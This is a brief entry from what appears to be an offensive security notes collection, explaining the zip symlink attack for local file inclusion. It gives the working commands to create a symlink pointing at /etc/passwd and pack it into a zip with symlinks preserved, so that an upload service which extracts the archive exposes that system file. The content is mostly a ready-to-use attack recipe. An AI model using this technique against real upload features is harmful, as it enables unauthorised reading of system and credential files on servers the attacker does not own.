killchain-compendium/Exploits/Compression/Zip Symlink.md

Zip Symlink

https://effortlesssecurity.in/zip-symlink-vulnerability/

The exploit is a method of using LFI through an uploaded symlink compressed inside a zip file. Create a symlink and put it in a zip file.

ln -s /etc/passwd link.name

compress it leaving symlinks intact

zip -r --symlinks mal.zip link.name